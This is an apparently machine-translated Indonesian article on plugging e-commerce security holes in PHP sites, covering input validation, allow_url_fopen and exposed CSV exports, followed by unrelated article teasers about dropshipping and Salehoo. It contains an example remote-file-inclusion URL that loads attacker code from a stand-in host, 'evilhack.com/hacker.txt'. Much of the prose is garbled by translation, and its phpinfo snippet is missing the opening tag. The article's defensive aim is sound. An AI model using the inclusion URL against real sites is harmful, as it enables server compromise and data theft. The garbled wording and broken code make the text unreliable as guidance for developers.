Keamanan dalam situs e-commerce perlu menjadi pertimbangan utama ketika mengembangkan e-commerce website atau perangkat lunak. Seorang pengembang perlu menyadari semua pertimbangan keamanan saat merancang sebuah situs. Dengan e-commerce menjadi lebih umum hari ini, jumlah serangan keamanan tentu meningkat. Paranoia adalah hal yang sehat untuk situs e-commerce pengembang, kita perlu tetap up-to gerbang dengan masalah keamanan, dan menjaga telinga dan mata kita terbuka. Meskipun celah berikut serius, celah berikut jika ada yang mudah diperbaiki.
Tercantum di bawah ini adalah beberapa pertimbangan keamanan untuk dimasukkan ketika mengembangkan sebuah situs. Artikel ini tidak meliputi e-mengutil, silakan lihat artikel terpisah saya ini.
User input - setiap masukan, apakah itu memasuki kuantitas, mencari produk, memasukkan nama dll, perlu divalidasi untuk karakter mencurigakan. Jika hal ini tidak dilakukan, adalah mungkin untuk memasuki akhir "?>", tag penutup PHP dan menjalankan beberapa kode PHP.
Hal ini jauh lebih aman membiarkan angka dan karakter az (ibukota termasuk) dan 0-9 dan apa-apa lagi, daripada membuat daftar semua karakter yang tidak boleh ada. Skrip memerlukan proses validasi untuk menggulir melalui setiap karakter satu per satu. Ini harus dapat dicapai dengan menggunakan validasi di sisi server, tidak Javascript. Menggunakan input validasi sisi server sangat penting untuk menjaga karakter yang tak diinginkan
Terdapat besar lainnya ketika menjalankan kode PHP. Ketika menggunakan PHP ada pengaturan yang disebut allow_url_fopen yang memungkinkan pembukaan file dari naskah PHP. Pengaturan ini harus dimatikan, kecuali sangat diperlukan.
Bayangkan Anda memiliki naskah PHP untuk kedua tetap header dan footer, dan untuk mengakses halaman Web yang akan Anda ketik http://www.mysite.com/index.php?page=page2. Yang dibutuhkan adalah pengguna jahat untuk menjalankan skrip dengan memodifikasi parameter-parameter ini dengan mengetikkan "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" dengan beberapa kode PHP dalam file "hacker.txt". Anda bisa memiliki apa pun yang terjadi, file PHP membaca, dihapus, informasi penting dicuri.
Jika Anda tidak yakin apakah pengaturan ini aktif atau nonaktif, silahkan salin kode PHP berikut ke file teks, dan meng-upload ke server web Anda:
phpinfo ();
?>
Ketika Anda mengakses script pada server Web Anda, Anda harus datang di pengaturan konfigurasi allow_url_fopen di bawah.
Seorang pengguna komputer, dalam keadaan normal tidak dapat menemukan nilai pengaturan ini.
Berhati-hatilah dengan data seperti perintah diekspor, produk dalam file CSV dan mySQL. Jika data ini diekspor dari sebuah skrip dan disimpan di web server di bawah nama file yang sama yaitu. http://www.mysite.com/admin/output_tables.csv. Ini hanya benar-benar menjadi masalah ketika data yang diekspor tinggal di sebuah file di dalam direktori yang dapat diakses oleh publik. Ada dua cara untuk mencegah celah keamanan ini - Pertama memiliki file output yang dilindungi dengan sandi direktori, kedua mempunyai data terletak di dalam bentuk textarea HTML elemen pada sebuah naskah. The storeowner dapat menyalin informasi ini dari textfile dan membuat file baru pada komputer mereka dan sisipkan informasi di sini.
Yang diperlukan hanyalah seorang hacker untuk mencari nama file ini dengan memeriksa e-commerce website demo perangkat lunak dan mencari nama file yang sama di situs nyata.
Di bawah ini tercantum lebih artikel yang berhubungan dengan artikel di atas dari "E-commerce" artikel kategori.
Orang yang tertarik pada artikel di atas "E-Commerce Keamanan - Menghubungkan Lubang Keamanan" juga tertarik pada artikel terkait yang tercantum di bawah ini:
Menjalankan bisnis e-commerce bukan hanya tentang menjaga situs web Anda dan berjalan. Pelanggan bergantung pada kemampuan Anda untuk melayani mereka melalui telepon, faks, email, atau cara lain, dan memerlukan semua sistem anda untuk dapat bekerja untuk dapat memenuhi permintaan pelanggan.
Hanya beberapa hari yang lalu saya sedang chatting dengan teman saya. Dia sedang merayakan bayinya's 1st ulang tahun dan harus lari antara pribumi di Kerala dan Chennai, tempat kerjanya. Lebih baik ia dan setengah perjalanan antara tempat-tempat ini setidaknya 4 kali dalam satu bulan terakhir.
Jika Anda telah melakukan e-commerce untuk jumlah waktu, Anda akan tahu bahwa ada lebih banyak daripada yang asli scamers grosir dropship penyedia layanan direktori. Dalam dunia e-bisnis, dan di seluruh dunia Salehoo Merek penyedia layanan reputasi baik yang telah mendapatkan popularitas dalam beberapa tahun terakhir.
Jika Anda pernah pengecer online, Anda mungkin telah mendengar tentang Salehoo atau bahkan menggunakannya untuk keuntungan Anda. Jika Anda hanya memulai dengan bisnis Anda, Anda mungkin bingung dengan ulasan Salehoo campuran di luar sana. Sekarang, mari kita lihat apa yang benar-benar Salehoo tentang bagaimana dan layanan yang mereka tawarkan yang banyak cenderung mengabaikan.
Berapa banyak orang yang Anda tahu bahwa telah membeli sesuatu online? Jika Anda seperti saya cukup banyak, itu sebabnya e-commerce adalah online baru di dunia pusat perbelanjaan. Tapi yang mengelola toko retail online ini? Orang seperti Anda dan saya, itulah sebabnya mengapa bisnis ini booming dan akan terus booming sekarang dan juga ke masa depan.
Jika Anda penggemar berat produk-produk elektronik terbaru, Anda mungkin tergoda oleh ide menjalankan bisnis elektronik Anda sendiri secara online. Hal ini tidak sulit untuk mendapatkan dimulai ketika Anda mengambil keuntungan penuh dari drop tepat pengiriman layanan elektronik dan ada banyak bagi Anda untuk memilih dari.
Apakah Anda pernah pergi ke toko lokal Anda dan bertanya-tanya apa jadinya jika Anda memilikinya? Apakah Anda pemilik yang baik, akan orang-orang seperti Anda? Nah artikel ini akan menunjukkan manfaat dari memiliki online Anda sendiri toko eceran, atau yang biasa dikenal sebagai e-commerce yang berbeda dari toko lokal sebenarnya.
